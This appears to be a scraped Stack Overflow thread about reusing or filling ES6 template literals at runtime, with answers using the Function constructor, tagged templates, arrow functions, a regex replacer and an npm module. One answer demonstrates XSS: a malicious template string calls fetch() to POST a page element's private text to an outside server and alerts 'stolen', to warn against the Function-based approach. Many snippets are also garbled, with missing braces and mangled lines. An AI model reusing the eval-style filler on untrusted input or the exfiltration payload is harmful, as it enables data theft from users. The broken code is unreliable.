Can ES6 template literals be substituted at runtime (or reused)?

To make these literals work like other template engines there needs to be an intermediary form.

The best way to do this is to use the Function constructor.

const templateString = "Hello ${}!";
const templateVars = {
    name: "world"    

const fillTemplate = function(templateString, templateVars){
    return new Function("return `"+templateString +"`;").call(templateVars);

console.log(fillTemplate(templateString, templateVars));

As with other template engines you can get that string from other places like a file.

There can be issues using this method like template tags are hard to use, but those can be added if you're clever. You also can't have inline JavaScript logic because of the late interpolation. This can also be remedied with some thought.

You can put a template string in a function:

function reusable(a, b) {
  return `a is ${a} and b is ${b}`;

You can do the same thing with a tagged template:

function reusable(strings) {
  return function(... vals) {
    return, i) {
      return `${s}${vals[i] || ""}`;

var tagged = reusable`a is ${0} and b is ${1}`; // dummy "parameters"
console.log(tagged("hello", "world"));
// prints "a is hello b is world"
console.log(tagged("mars", "jupiter"));
// prints "a is mars b is jupiter"

The idea is to let the template parser split out the constant strings from the variable "slots", and then return a function that patches it all back together based on a new set of values each time.

Probably the cleanest way to do this is with arrow functions (because at this point, we're using ES6 already)

var reusable = () => `This ${object} was created by ${creator}`;

var object = "template string", creator = "a function";
console.log (reusable()); // "This template string was created by a function"

object = "example", creator = "me";
console.log (reusable()); // "This example was created by me"

...And for tagged template literals:

reusable = () => myTag`The ${noun} go ${verb} and `;

var noun = "wheels on the bus", verb = "round";
var myTag = function (strings, noun, verb) {
    return strings[0] + noun + strings[1] + verb + strings[2] + verb;
console.log (reusable()); // "The wheels on the bus go round and round"

noun = "racecars", verb = "fast";
myTag = function (strings, noun, verb) {
    return strings[0] + noun + strings[1] + verb;
console.log (reusable()); // "The racecars go fast"

This also avoids the use of eval() or Function() which can cause problems with compilers and cause a lot of slowdown.

Yes you can do it by parsing your string with template as JS by Function (or eval) - but this is not recommended and allow XSS attack

// unsafe string-template function
const fillTemplate = function(templateString, templateVars){
    return new Function("return `"+templateString +"`;").call(templateVars);

function parseString() {
  // Example malicious string which will 'hack' fillTemplate function
  var evilTemplate = "`+fetch('',{method: 'POST', body: JSON.stringify({ info: document.querySelector('#mydiv').innerText }) }) + alert('stolen')||''`";

  var templateData = {Id:1234, User:22};
  var result = fillTemplate(evilTemplate, templateData);


  alert(`Look on Chrome console> networks and look for POST server?id... request with stolen data (in section "Request Payload" at the bottom)`);

#mydiv { background: red; margin: 20px}

.btn { margin: 20px; padding: 20px; }
CASE: system allow users to use 'templates' and use
fillTemplate function to put variables into that templates
Then backend save templates in DB and show them to other users...

Some bad user/hacker can then prepare malicious template 
with JS code... and when other logged users "see" that malicious 
template (e.g. by "Click me!" in this example), 
then it can read some information from their current 
page with private content and send it to external server. 

Or in worst case, that malicious template can send some 
authorized "action" request to the backend... 
(like e.g. action which delete some user content or change his name etc.).
In case when logged user was Admin then
action can be even more devastating (like delete user etc.)
<div id='mydiv'>
Private content of some user

<div id="msg"></div>

<button class="btn" onclick="parseString()">Click me! :)</button>

Instead you can safely insert object obj fields to template str in dynamic way as follows

let inject = (str, obj) => str.replace(/\${(.*?)}/g, (x,g)=> obj[g]);

let inject = (str, obj) => str.replace(/\${(.*?)}/g, (x,g)=> obj[g]);

// --- test ---

// parameters in object
let t1 = 'My name is ${name}, I am ${age}. My brother name is also ${name}.';
let r1 = inject(t1, {name: 'JOHN',age: 23} );
console.log("OBJECT:", r1);

// parameters in array
let t2 = "Values ${0} are in ${2} array with ${1} values of ${0}."
let r2 = inject(t2, ['A,B,C', 666, 'BIG'] );
console.log("ARRAY :", r2);

2019 answer:

Note: The library originally expected users to sanitise strings to avoid XSS. Version 2 of the library no longer requires user strings to be sanitised (which web developers should do anyway) as it avoids eval completely.

The es6-dynamic-template module on npm does this.

const fillTemplate = require('es6-dynamic-template');

Unlike the current answers:

  • It uses ES6 template strings, not a similar format. Update version 2 uses a similar format, rather than ES6 template strings, to prevent users from using unsanitised input Strings.
  • It doesn't need this in the template string
  • You can specify the template string and variables in a single function
  • It's a maintained, updatable module, rather than copypasta from StackOverflow

Usage is simple. Use single quotes as the template string will be resolved later!

const greeting = fillTemplate('Hi ${firstName}', {firstName: 'Joe'});